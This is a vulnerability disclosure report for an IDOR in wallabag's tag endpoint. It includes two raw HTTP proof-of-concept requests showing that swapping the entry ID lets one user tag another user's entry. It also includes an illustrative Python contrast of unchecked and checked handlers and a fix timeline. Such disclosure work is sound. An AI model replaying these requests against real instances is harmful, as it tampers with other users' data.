IDOR vulnerability allows adding tags to another user's entry in wallabag/wallabag

Valid

Reported on

Feb 3rd 2023


Description

An IDOR vulnerability allows a logged-in user to add tags to any other user's entry, since the endpoint does not verify which user the entry belongs to. In addition, the input is not limited, which causes the entry interface to break.

Proof of Concept

Step 1. User A manages entry id 6

Step 2. User B manages entry id 7

Step 3. Log in as user A and add a tag to this user's entry

e.g., demo request as user A:

POST /new-tag/6 HTTP/1.1
Host: localhost
Content-Length: 85
Cache-Control: max-age=0
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/view/6
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: security_level=0; PHPSESSID=55d2bbe519f7c1f342384481e630a78a; REMEMBERME=V2FsbGFiYWdcVXNlckJ1bmRsZVxFbnRpdHlcVXNlcjpaSFY1YkdzPToxNzA2OTQxNTMzOjk3YmY0ZDdmYzFjNzQwZTdiMzZjYWEzOGM5ZjA1MzhjMTlkOTNiMGM0NjgzN2MwOTIzM2NhNGIxZGU4N2FmYWI%3D
Connection: close

tag[label]=demoidor&tag[add]=&tag[_token]=Zqf_ZVhMZ9bUpJaC-y3kbskI1GtKRuIs5mWOqogaAVM

Step 4. Change the ID to 7. The tag is now added to user B's entry.

POST /new-tag/7 HTTP/1.1
Host: localhost
Content-Length: 85
Cache-Control: max-age=0
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/view/6
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: security_level=0; PHPSESSID=55d2bbe519f7c1f342384481e630a78a; REMEMBERME=V2FsbGFiYWdcVXNlckJ1bmRsZVxFbnRpdHlcVXNlcjpaSFY1YkdzPToxNzA2OTQxNTMzOjk3YmY0ZDdmYzFjNzQwZTdiMzZjYWEzOGM5ZjA1MzhjMTlkOTNiMGM0NjgzN2MwOTIzM2NhNGIxZGU4N2FmYWI%3D
Connection: close

tag[label]=demoidor&tag[add]=&tag[_token]=Zqf_ZVhMZ9bUpJaC-y3kbskI1GtKRuIs5mWOqogaAVM

Step 5. The input value is not limited, so entering more than 200 characters breaks the interface.

Impact

An attacker can add tags to other users' entries and break the entry interface.
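
The following is an added example, not wallabag's code and not the fix from the commit referenced on this page: a minimal Python model of a tag handler that shows the missing ownership check next to a hardened version. The in-memory store, function names, status codes and the 200-character cap are assumptions made for illustration.

```python
from dataclasses import dataclass, field

# Assumed cap: the report only says that more than 200 characters breaks the UI.
MAX_LABEL_LEN = 200


@dataclass
class Entry:
    owner: str
    tags: list = field(default_factory=list)


def make_store():
    # Constructed sample data mirroring the PoC: user A owns entry 6, user B owns entry 7.
    return {6: Entry(owner="A"), 7: Entry(owner="B")}


def add_tag_unchecked(store, session_user, entry_id, label):
    """Behaviour the report describes: the entry is loaded by ID alone."""
    entry = store.get(entry_id)
    if entry is None:
        return 404
    entry.tags.append(label)  # no ownership check, no length limit
    return 302  # hypothetical redirect back to the entry view


def add_tag_checked(store, session_user, entry_id, label):
    """Hardened handler: tie the lookup to the session user and bound the label."""
    entry = store.get(entry_id)
    # Same 404 for "missing" and "not yours", so entry IDs cannot be enumerated.
    if entry is None or entry.owner != session_user:
        return 404
    label = label.strip()
    if not label or len(label) > MAX_LABEL_LEN:
        return 400
    entry.tags.append(label)
    return 302
```

A regression test for this class of bug should replay the tag request as user A against an entry owned by user B and assert that the entry's tag list is unchanged.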

References

We are processing your report and will contact the wallabag team within 24 hours. 2 months ago
We have contacted a member of the wallabag team and are waiting to hear back 2 months ago
wallabag/wallabag maintainer has acknowledged this report 2 months ago
Jérémy Benoist validated this vulnerability 2 months ago
Juy Lang has been awarded the disclosure bounty
The fix bounty is now up for grabs
Jérémy Benoist marked this as fixed in 2.5.4 with commit acd285 2 months ago
Jérémy Benoist has been awarded the fix bounty
This vulnerability has been assigned a CVE
Jérémy Benoist published this vulnerability 2 months ago
wallabag/wallabag maintainer gave praise 2 months ago
Thank you @juylang !
Juy Lang
a month ago

Researcher


I see the CVE has not been assigned. Please help me!!

Ben Harvie
a month ago

Admin


Hey, it looks like our system bugged and your CVE was stuck in an assigned state, we have now published the CVE, please allow some time for Mitre to update it on their side. Thanks!
